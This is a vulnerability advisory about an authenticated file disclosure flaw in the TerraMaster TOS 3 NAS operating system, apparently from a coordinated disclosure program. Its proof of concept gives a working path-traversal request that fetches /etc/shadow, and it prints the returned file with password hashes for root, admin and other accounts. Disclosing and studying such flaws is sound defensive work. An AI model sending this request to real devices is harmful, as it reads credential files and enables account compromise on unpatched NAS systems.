The following advisory describes a File Disclosure vulnerability found in TerraMaster Operating System (TOS) version 3.
TerraMaster Operating System, TOS is a Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
TerraMaster has released patches to address this vulnerability – “Tech team limit the normal user’s rights”.
The TerraMaster Operating System is vulnerable to a file disclosure vulnerability.
The vulnerability can be found in “index.php” file. When calling it with the parameters “explorer/fileProxy&path=” any authenticated user can download any file found in the system.
Proof of Concept
An attacker that is logged in to the remote NAS, can by sending the following request download the /etc/shadow file:
GET IPOfTheServer:Port/3.0//index.php?explorer/fileProxy&path=...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fshadow HTTP/1.1 Host: 127.0.0.1:8181
As can be seen below, in response, the TerraMaster Operating System will send the /etc/shadow file to the attacker:
root:$1$SgVbyjor$C7Ts4QXkjSjmHA5nSNH7x91:17220:0:99999:7::: mysql:!:15139:0:99999:7::: sshd:!:15139:0:99999:7::: daemon:!:15206:0:99999:7::: admin:$1$0/E6lWfi$qW5uGkMDFddDs3Pbt.UQyO/:17220:0:99999:7::: rsync:$1$eCUOYuA7$T0mPjcyv6gq8CvwrNsKBX1:15278:0:99999:7::: TimeMachine:$1$YEyZ4a58$RN4xjc0/3to9s3b0Fn4nU1:15310:0:99999:7::: guest:$1$sEXZ4zTY$bxAsHrNEqAGtziZ5hlwLo.:15293:0:99999:7:::